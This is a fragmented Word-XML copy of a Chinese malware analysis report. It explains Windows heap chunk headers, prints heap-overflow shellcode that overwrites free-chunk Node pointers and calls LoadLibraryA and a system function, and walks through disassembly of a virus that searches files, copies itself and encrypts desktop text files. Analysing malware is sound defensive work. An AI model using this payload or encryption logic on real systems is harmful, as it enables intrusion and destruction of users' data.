        <w:t> +0x000 Sizes : _HEAP_VS_CHUNK_HEADER_SIZE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+0x000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MemoryCost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Pos 0, 16 Bits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+0x000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UnsafeSize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Pos 16, 16 Bits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+0x004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UnsafePrevSize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Pos 0, 16 Bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> +0x004 Allocated : Pos 16, 8 Bits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 xml:space="preserve"> +0x000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KeyUShort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Uint2B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+0x000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KeyULong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Uint4B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+0x000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HeaderBits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Uint8B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+0x008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EncodedSegmentPageOffset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Pos 0, 8 Bits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+0x008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UnusedBytes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Pos 8, 1 Bit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+0x008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SkipDuringWalk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Pos 9, 1 Bit</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> +0x008 Spare : Pos 10, 22 Bits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+0x008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AllocatedChunkBits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Uint4B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+0x000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OverlapsHeader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Uint8B</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> //Node结构的大小为24个字节</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> +0x008 Node : _RTL_BALANCED_NODE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  <w:t>空闲块头如下：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1A2B3E1B" wp14:editId="3533C283">
            <wp:extent cx="5274310" cy="16021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  <w:t>已分配块的头部的大小是8个字节</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>_HEAP_VS_CHUNK_HEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> +0x000 Sizes : _HEAP_VS_CHUNK_HEADER_SIZE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+0x000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MemoryCost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Pos 0, 16 Bits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+0x000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UnsafeSize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Pos 16, 16 Bits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+0x004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UnsafePrevSize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Pos 0, 16 Bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> +0x004 Allocated : Pos 16, 8 Bits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+0x000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KeyUShort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Uint2B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+0x000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KeyULong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Uint4B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+0x000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HeaderBits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Uint8B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 xml:space="preserve"> +0x008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EncodedSegmentPageOffset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Pos 0, 8 Bits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+0x008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UnusedBytes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Pos 8, 1 Bit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+0x008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SkipDuringWalk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Pos 9, 1 Bit</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> +0x008 Spare : Pos 10, 22 Bits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+0x008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AllocatedChunkBits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: Uint4B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  <w:t>已分配块如下：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07FA5925" wp14:editId="7180FEF7">
            <wp:extent cx="5274310" cy="11010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  <w:t>6.下面看看注入的shellcode，</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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>        "BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"BBBBBBBBBBBBBBBB"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"CCCCDDDD"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//上面的字符填充空闲块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    </w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\x90\x90\x90\x90\x90\x90</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\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xeb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\x08" //覆盖空闲块中Node节点以上的头部字段   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"\x14\xF7\xE2\x77" //覆盖Node节点的左指针,主要用来重定向攻击                       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"\x4C\x14\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xEC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\x77" //覆盖Node节点的右指针，主要用来重定向攻击                   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"\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68"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"\x52\x54\x2E\x44\x68\x4D\x53\x56\x43\x8B\xC4\x50\xB8"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"\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xcf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\x05\xe7\x77"  //调用了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LoadLibraryA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()函数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"\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xFF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\xD0\x33\xC0\x50\xC6\x04\x24\x63\xC6\x44\x24\x01"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"\x6F\xC6\x44\x24\x02\x6D\x68\x61\x6E\x64\x2E\x68\x63"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"\x6F\x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6D\x6D\x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8B\xC4\x50\xB8"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"\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xbf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\x8e\x01\x78" //系统地址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"\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xFF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\xD0";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  <w:t>堆溢出的原理如下：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2A3A90EC" wp14:editId="0E1BADB0">
            <wp:extent cx="4122420" cy="49377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  <w:t>3.文件加密和查找算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1.在导入的函数中，可以看到_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findfirst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、_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findnext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等函数，那么有文件查找函数。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23D67538" wp14:editId="38D21657">
            <wp:extent cx="4175760" cy="12039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  <w:t>2.进行文件搜索匹配之前要调用获取某路径所有文件的函数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getFiles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,该函数主要是通过通配符的方式进行查找并获取路径下所有的文件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755BA3C2" wp14:editId="138ED8DC">
            <wp:extent cx="4488180" cy="868680"/>
            <wp:effectExtent l="0" t="0" r="762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>3.getFiles函数使用了递归算法(自身调用自身)，对于文件夹文件则调用自己，对于非系统文件和非文件夹文件则存入，该函数的算法如下：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57A62F14" wp14:editId="40B66158">
            <wp:extent cx="3817620" cy="10210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esp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1CCh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.text:004014B0                 mov     [ebp+var_1A4], offset sub_404AA0 ; 存放404aa0函数地址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.text:004014BA                 mov     [ebp+var_1A0], offset dword_4BB440 ; 存放4bb440函数地址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.text:004014C4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[ebp+var_19C]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.text:004014CA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ebx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[ebp+var_18]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ebx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为桌面路径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.text:004014CD                 mov     [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],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ebx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存放桌面路径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.text:004014CF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offset loc_4017C7 ; 存放4017c7函数地址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.text:004014D4                 mov     [eax+4],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.text:004014D7                 mov     [eax+8],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esp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; [eax+8]为-2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.text:004014DA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[ebp+var_1BC] ; 存放ntdll.77b32c00函数地址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.text:004014E0                 mov     [esp+1D8h+Str1],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>.text:004014E3                 call    sub_42ABE0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.text:004014E8                 mov     [ebp+var_1C], 0 ; 变量h=0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.text:004014EF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[ebp+var_4D]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.text:004014F2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>.text:004014F4                 call    nullsub_7       ; 对某字符串进行初始化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.text:004014F9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[ebp+var_180]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.text:004014FF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[ebp+var_4D]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.text:00401502                 mov     [esp+1D8h+Str2],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; int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.text:00401506                 mov     [esp+1D8h+Str1], offset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pStr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; char *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.text:0040150D                 mov     [ebp+var_1B8], 1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.text:00401517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>.text:00401519                 call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StringEqual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; 字符串赋值操作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.text:0040151E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esp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8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.text:00401521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[ebp+var_4D]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.text:00401524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>.text:00401526                 call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StringAllocator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; 字符串初始化函数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.text:0040152B                 mov     [esp+1D8h+Str2], offset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pStr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; char *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.text:00401533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ebp+delfile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delfile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存放在堆栈中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.text:00401536                 mov     [esp+1D8h+Str1],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; int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.text:00401539                 mov     [ebp+var_1B8], 2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.text:00401543                 call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getSize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 ; 获取字符串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delfile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的长度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.text:00401548                 test    al, al          ; 判断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delfile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的长度是否为0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.text:0040154A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jnz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short loc_40155A ; </w:t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>不为空跳转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.text:0040154C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ebp+delfile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] ; 传入.doc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.text:0040154F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>.text:00401551                 call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StrAppend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; 把文件后缀名附加到字符串尾部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.text:00401556                 test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判断字符串是否为空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.text:00401558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jnz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short loc_401561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.text:0040155A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.text:0040155A loc_40155A:                             ; CODE XREF: getFiles+A6↑j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.text:0040155A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1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.text:0040155F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jmp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short loc_401566 ; 判断字符串是否为空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.text:00401561 ; ---------------------------------------------------------------------------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.text:00401561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.text:00401561 loc_401561:                             ; CODE XREF: getFiles+B4↑j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.text:00401561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0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.text:00401566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.text:00401566 loc_401566:                             ; CODE XREF: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getFiles+BB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↑j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.text:00401566                 test    al, al          ; 判断字符串是否为空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.text:00401568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jz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short loc_401588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为文件后缀名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.text:0040156A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ebp+delfile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]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>.text:0040156D                 mov     [esp+1D8h+Str1], offset asc_4BF05F ; "*"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.text:00401574                 mov     [ebp+var_1B8], 2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.text:0040157E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>.text:00401580                 call    StringEqual3    ; 字符串赋值函数[/size]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[size=3]text:00401585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esp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4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.text:00401588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.text:00401588 loc_401588:                             ; CODE XREF: getFiles+C4↑j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.text:00401588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[ebp+var_180]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为文件后缀名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.text:0040158E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[ebp+arg_0] ; 传入桌面路径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.text:00401591                 mov     [esp+1D8h+Str1],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; 把桌面路径传入堆栈中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.text:00401594                 mov     [ebp+var_1B8], 2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.text:0040159E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>.text:004015A0                 call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DealPath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把桌面路径添加到字符串</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的后面</w:t>
      </w:r>
      <w:proofErr w:type="gram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.text:004015A5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esp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4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.text:004015A8                 mov     [esp+1D8h+Str1], offset asc_4BF061 ; "\\"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.text:004015AF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>.text:004015B1                 call    StrAppend2      ; 把"\\"添加到字符串</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的后面</w:t>
      </w:r>
      <w:proofErr w:type="gram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.text:004015B6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esp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4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.text:004015B9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.text:004015BB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ebp+delfile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] ; </w:t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>文件类型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.text:004015BE                 mov     [esp+1D8h+Str1],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.text:004015C1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>.text:004015C3                 call    StrAppend3      ; 把文件类型字符串添加到字符串</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的后面</w:t>
      </w:r>
      <w:proofErr w:type="gram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.text:004015C8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esp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4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.text:004015CB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>.text:004015CD                 call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StringToChar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.text:004015D2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.text:004015D4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[ebp+var_168]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为桌面路径+文件类型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.text:004015DA                 mov     [esp+1D8h+Str2],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; 传入函数的第二个参赛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.text:004015DE                 mov     [esp+1D8h+Str1],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>.text:004015E1                 call    _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findfirst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.text:004015E6                 mov     [ebp+var_1C],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; 存储返回值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.text:004015E9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cmp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[ebp+var_1C], 0FFFFFFFFh ; 是否找到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.text:004015ED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setnz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al              ; 低8为设置为0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.text:004015F0                 test    al, al          ; 判断返回值是否为0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.text:004015F2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jz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loc_4017AB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.text:004015F8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.text:004015F8 loc_4015F8:                             ; CODE XREF: getFiles+2F7↓j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.text:004015F8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[ebp+var_168] ; 传入文件属性值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 xml:space="preserve">.text:004015FE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cmp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14h        ; 比较是否为系统文件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.text:00401601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jz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loc_40177C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.text:00401607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[ebp+var_168] ; 传入文件属性值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.text:0040160D                 and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10h        ; 文件属性值跟0x10进行与操作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.text:00401610                 test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判断返回的结果是否为0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.text:00401612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jz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loc_40171F      ; 传入文件路径+文件类型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.text:00401618                 mov     [esp+1D8h+Str2], offset Str2 ; "."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.text:00401620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[ebp+var_168] ; 传入文件属性值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.text:00401626                 add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14h        ; 偏移0x14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.text:00401629                 mov     [esp+1D8h+Str1],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; Str1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.text:0040162C                 call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strcmp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  ; 判断文件类型是否是'.'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.text:00401631                 test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判断是否相等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.text:00401633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jz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loc_40177D      ; 把文件地址传入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.text:00401639                 mov     [esp+1D8h+Str2], offset a__ ; 变量type1为..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.text:00401641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[ebp+var_168] ; 传入文件属性值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 xml:space="preserve">.text:00401647                 add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14h        ; 偏移0x14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.text:0040164A                 mov     [esp+1D8h+Str1],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; Str1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.text:0040164D                 call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strcmp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  ; 判断文件名是否是'.'[/size]</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>[size=3].text:00401652                 test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 判断是否相等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.text:00401654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jz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loc_40177D      ; 把文件地址传入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.text:0040165A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[ebp+var_4D+1]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.text:0040165D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ebp+delfile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] ; 把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delfile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地址传入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.text:00401660                 mov     [esp+1D8h+Str1],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>.text:00401663                 mov     [ebp+var_1B8], 2[/size]</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>[size=3].........[/size]</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>[size=3].........</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>[/size]</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>[size=3]0171F:                             ; CODE XREF: getFiles+16E↑j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.text:0040171F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[ebp+var_180] ; 传入文件路径+文件类型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.text:00401725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[ebp+arg_0]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.text:00401728                 mov     [esp+1D8h+Str1],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>.text:0040172B                 mov     [ebp+var_1B8], 2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.text:00401735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赋值文件路径+文件类型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.text:00401737                 call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DealPath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</w:t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>处理桌面路径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.text:0040173C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esp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4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.text:0040173F                 mov     [esp+1D8h+Str1], offset asc_4BF061 ; "\\"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.text:00401746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>.text:00401748                 call    StrAppend2      ; 在文件路径后面加上'\\'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.text:0040174D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esp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4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.text:00401750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.text:00401752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[ebp+var_168] ; 传入文件属性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.text:00401758                 add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14h        ; 偏移0x14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.text:0040175B                 mov     [esp+1D8h+Str1],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; char *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.text:0040175E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>.text:00401760                 call    StrAppend2      ; 在后面添加文件名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.text:00401765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esp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4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.text:00401768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.text:0040176A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[ebp+arg_4] ; 文件路径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.text:0040176D                 mov     [esp+1D8h+Str1],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.text:00401770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>.text:00401772                 call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Addfile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 ; 把文件路径添加进去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.text:00401777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esp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4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.text:0040177A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jmp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short loc_40177D ; 把文件地址传入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>.text:0040177C ; ---------------------------------------------------------------------------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.text:0040177C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.text:0040177C loc_40177C:                             ; CODE XREF: getFiles+15D↑j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.text:0040177C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nop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>.text:0040177D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.text:0040177D loc_40177D:                             ; CODE XREF: getFiles+18F↑j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.text:0040177D                                         ; getFiles+1B0↑j ...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.text:0040177D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[ebp+var_168] ; 把文件地址传入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.text:00401783                 mov     [esp+1D8h+Str2],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.text:00401787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[ebp+var_1C] ; 传入文件句柄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.text:0040178A                 mov     [esp+1D8h+Str1],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>.text:0040178D                 call    _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findnext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; 找到下一个文件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.text:00401792                 test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判断是否找到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.text:00401794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setz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al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.text:00401797                 test    al, al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.text:00401799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jz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short loc_4017A0 ; 传入文件句柄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.text:0040179B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jmp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loc_4015F8      ; 传入文件属性值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.text:004017A0 ; ---------------------------------------------------------------------------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>.text:004017A0</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>.text:004017A0 loc_4017A0:                             ; CODE XREF: getFiles+2F5↑j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.text:004017A0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[ebp+var_1C] ; 传入文件句柄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.text:004017A3                 mov     [esp+1D8h+Str1],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>.text:004017A6                 call    _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findclose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; 关闭文件句柄</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>[/size]</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>[size=3]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  <w:t>4.获取某路径中所有文件路径之后，把存入文件路径的vector传入文件搜索匹配函数中，文件搜索匹配函数主要是使用了二分查找算法，这样可以降低时间复杂度，加快对文件的查找，文件搜索匹配算法如下：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1D68F7CC" wp14:editId="06EE93D6">
            <wp:extent cx="5274310" cy="11703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5EF7054E" wp14:editId="2CB27199">
            <wp:extent cx="5274310" cy="28435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45936404" wp14:editId="2CD19090">
            <wp:extent cx="5274310" cy="46272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  <w:t>5.病毒在两个地方使用了文件搜索匹配函数，一个是把病毒拷到系统盘时，判断系统盘是否有病毒程序，另一个是对桌面txt文件进行加密时，找到桌面所有的txt文件。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4270CFC2" wp14:editId="413EE0CE">
            <wp:extent cx="5274310" cy="20224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7CDF2B4D" wp14:editId="15A6E489">
            <wp:extent cx="5274310" cy="14465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  <w:t>6.在病毒运行部分，病毒对txt文件进行了加密，那么病毒用的是自身写的加密函数，首先该病毒读取桌面的txt文件，然后读取里面的内容，随后对内容进行加密，并写入到txt文件中，找到并读取txt文件的算法程序如下：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188D2369" wp14:editId="2FAD1067">
            <wp:extent cx="5274310" cy="41763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79941F20" wp14:editId="7869BCAB">
            <wp:extent cx="5274310" cy="16071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  <w:t>7.加密函数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encrycode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，运用了两个十六进制数组来对txt文件内容进行加密，随后通过一些逻辑运算对txt文件内容进行处理，随后生成字符串写入文件中，该加密函数算法如下：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.text:00403A1E                 call    sub_42ABE0      ; 以下定义了一个int数组Mod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.text:00403A23                 mov     [ebp+var_52], 45h ; 数组第一个元素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.text:00403A27                 mov     [ebp+var_51], 89h ; </w:t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>数组第二个元素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.text:00403A2B                 mov     [ebp+var_50], 41h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.text:00403A2F                 mov     [ebp+var_4F], 80h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.text:00403A33                 mov     [ebp+var_4E], 42h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.text:00403A37                 mov     [ebp+var_4D], 59h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.text:00403A3B                 mov     [ebp+var_4C], 15h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.text:00403A3F                 mov     [ebp+var_4B], 46h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.text:00403A43                 mov     [ebp+var_4A], 19h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.text:00403A47                 mov     [ebp+var_49], 82h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.text:00403A4B                 mov     [ebp+var_48], 10h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.text:00403A4F                 mov     [ebp+var_47], 20h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.text:00403A53                 mov     [ebp+var_46], 87h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.text:00403A57                 mov     [ebp+var_45], 45h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.text:00403A5B                 mov     [ebp+var_44], 32h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.text:00403A5F                 mov     [ebp+var_43], 65h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.text:00403A63                 mov     [ebp+var_42], 55h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.text:00403A67                 mov     [ebp+var_41], 11h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.text:00403A6B                 mov     [ebp+var_40], 22h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.text:00403A6F                 mov     [ebp+var_3F], 33h ; 数组第20个元素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.text:00403A73                 mov     [esp+0E8h+Time], 0 ; Time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.text:00403A7A                 call    time            ; 调用time函数，传入time函数的参数为NULL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.text:00403A7F                 mov     [esp+0E8h+Time],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; Seed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.text:00403A82                 call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srand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   ; 设置随机因子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.text:00403A87                 mov     [ebp+var_1C], 0 ; 定</w:t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>义新变量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，初始化值为0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.text:00403A8E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[ebp+var_3E]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.text:00403A91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>.text:00403A93                 call    nullsub_7       ; 为析构函数，第一次访问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变量时使用析构函数进行注册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.text:00403A98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[ebp+var_3E]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.text:00403A9B                 mov     [esp+0E8h+DstBuf],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; int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.text:00403A9F                 mov     [esp+0E8h+Time], offset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pStr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; char *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.text:00403AA6                 mov     [ebp+var_C8], 1 ; 上一行定义了一个字符串，赋值为“”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.text:00403AB0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[ebp+arg_0]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.text:00403AB3                 call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StringEqual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; 字符串初始化函数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.text:00403AB8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esp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8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.text:00403ABB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[ebp+var_3E] ; 函数第二个参数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len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.text:00403ABE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>.text:00403AC0                 call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StringAllocator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; 把字符串装换成字符数组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.text:00403AC5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.text:00403AC5 loc_403AC5:                             ; CODE XREF: .text:00403F3D↓j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.text:00403AC5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[ebp+arg_8] ; 循环结构，该函数的加密循环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.text:00403AC8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1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.text:00403ACB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[eax+3]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.text:00403ACE                 test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lastRenderedPageBreak/>
        <w:t>len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是否为空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.text:00403AD0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cmovs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.text:00403AD3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2  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len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/4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.text:00403AD6                 add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1  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len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/4+1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.text:00403AD9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cmp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[ebp+var_1C]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len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与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进行比较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.text:00403ADC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jle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loc_40400D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&lt;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len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/4+1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.text:00403AE2                 mov     [ebp+var_1D], 35h ; 变量k1,值为0x35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.text:00403AE6                 mov     [ebp+var_1E], 25h ; 变量k1,值为0x25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.text:00403AEA                 mov     [ebp+var_1F], 45h ; 变量k3,值为0x45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.text:00403AEE                 mov     [ebp+var_20], 55h ; 变量k4,值为0x55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.text:00403AF2                 call    rand            ; 生成随机数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.text:00403AF7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=rand()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.text:00403AF9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66666667h  ; 以下是求模操作，求模的操作数为0x14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.text:00403AFE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.text:00403B00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imul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    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=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*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.text:00403B02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3          ; 66666667h右移三位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 xml:space="preserve">.text:00403B05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=rand()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.text:00403B05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encrycode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endp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sp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-analysis failed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.text:00403B05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.text:00403B07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.text:00403B07 loc_403B07:                             ; 随机值右移0x1f位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.text:00403B07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1Fh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.text:00403B0A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66666667&lt;&lt;3-66666667&lt;&lt;0x1f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.text:00403B0C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=66666667&lt;&lt;3-66666667&lt;&lt;0x1f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.text:00403B0E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shl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2          ; (66666667&lt;&lt;3-66666667&lt;&lt;0x1f)&gt;&gt;2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.text:00403B11                 add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(66666667&lt;&lt;3-66666667&lt;&lt;0x1f)&gt;&gt;2+66666667&lt;&lt;3-66666667&lt;&lt;0x1f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.text:00403B13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shl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2          ; ((66666667&lt;&lt;3-66666667&lt;&lt;0x1f)&gt;&gt;2+66666667&lt;&lt;3-66666667&lt;&lt;0x1f)&gt;&gt;2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.text:00403B16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rand()-((66666667&lt;&lt;3-66666667&lt;&lt;0x1f)&gt;&gt;2+66666667&lt;&lt;3-66666667&lt;&lt;0x1f)&gt;&gt;2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.text:00403B18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edx=rand()-((66666667&lt;&lt;3-66666667&lt;&lt;0x1f)&gt;&gt;2+66666667&lt;&lt;3-66666667&lt;&lt;0x1f)&gt;&gt;2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.text:00403B1A                 mov     [ebp-21h], dl   ; [ebp-21h]为变量t1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.text:00403B1D                 call    rand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.text:00403B22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lastRenderedPageBreak/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=rand()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.text:00403B24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66666667h  ; 以下是求模操作，求模的操作数为0x14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.text:00403B29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下面同上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.text:00403B2B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imul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.text:00403B2D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3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.text:00403B30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.text:00403B32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1Fh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.text:00403B35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.text:00403B37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.text:00403B39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shl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2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.text:00403B3C                 add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.text:00403B3E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shl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2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.text:00403B41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.text:00403B43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>.text:00403B45                 mov     [ebp-22h], dl   ; [ebp-22h]为变量t2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.text:00403B48                 call    rand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.text:00403B4D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=rand()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.text:00403B4F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80808081h  ; 以下是求模操作，求模的操作数为0xff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.text:00403B54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=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oxff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.text:00403B56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imul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     ; 求模操作同上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.text:00403B58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edx+ecx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.text:00403B5B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7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 xml:space="preserve">.text:00403B5E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.text:00403B60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.text:00403B62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1Fh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.text:00403B65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.text:00403B67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.text:00403B69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.text:00403B6B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shl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8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.text:00403B6E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.text:00403B70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.text:00403B72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求模操作结束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.text:00403B74                 mov     [ebp-23h], al   ; [ebp-23h]为变量t3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.text:00403B77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[ebp-1Ch]  ; [ebp-1Ch]为待加密数组的最后元素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.text:00403B7A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[ebp+0Ch]  ; [ebp+0Ch]为待加密数组的第一个元素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.text:00403B7D                 add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.text:00403B7F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byte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为待加密数组的第一个元素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.text:00403B82                 test    al, al          ; 是否为结束符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.text:00403B84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jz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short loc_403BF4 ; 是的话，跳转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.text:00403B86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byte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[ebp-22h]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为t2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.text:00403B8A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byte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[ebp+eax-52h]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为mod[t2]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.text:00403B8F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al         ; </w:t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>取低8位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.text:00403B92                 and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74h        ; 0x74&amp;mod[t2]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.text:00403B95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为0x74&amp;mod[t2]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.text:00403B97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byte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[ebp-21h]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为t1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.text:00403B9B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byte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[ebp+eax-52h]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为mod[t1]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.text:00403BA0                 or      al, [ebp-1Eh]   ; k2|mod[t1]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.text:00403BA3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al        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为k2|mod[t1]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.text:00403BA6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[eax+39h]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为0x39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.text:00403BA9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byte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[ebp-1Dh]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.text:00403BAD                 and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k2|mod[t1])&amp;k1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.text:00403BAF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ebx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ebx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为0x74&amp;mod[t2]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.text:00403BB1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xor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ebx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0x74&amp;mod[t2])^0x39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.text:00403BB3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10FEF011h  ; 求模操作，操作数是0xf1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.text:00403BB8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ebx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.text:00403BBA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imul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.text:00403BBC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4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.text:00403BBF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ebx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 xml:space="preserve">.text:00403BC1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1Fh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.text:00403BC4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.text:00403BC6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.text:00403BC8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imul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0F1h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.text:00403BCE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ebx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.text:00403BD0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ebx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=k2|mod[t1])&amp;k1)%0xf1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.text:00403BD2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44D72045h  ; 求模操作，操作数是0xee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.text:00403BD7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.text:00403BD9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imul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.text:00403BDB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6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.text:00403BDE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.text:00403BE0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1Fh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.text:00403BE3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.text:00403BE5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.text:00403BE7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imul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0EEh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.text:00403BED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.text:00403BEF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=(((0x74&amp;mod[t2])^0x39+(k2|mod[t1])&amp;k1)%0xf1)%0xee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.text:00403BF1                 mov     [ebp-1Dh], al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.text:00403BF4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.text:00403BF4 loc_403BF4:                             ; CODE XREF: .text:00403B84↑j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.text:00403BF4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[ebp-1Ch]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为待加密数组的第一元素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.text:00403BF7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[eax+1]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为待加密数组的下标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.text:00403BFA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[ebp+0Ch]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 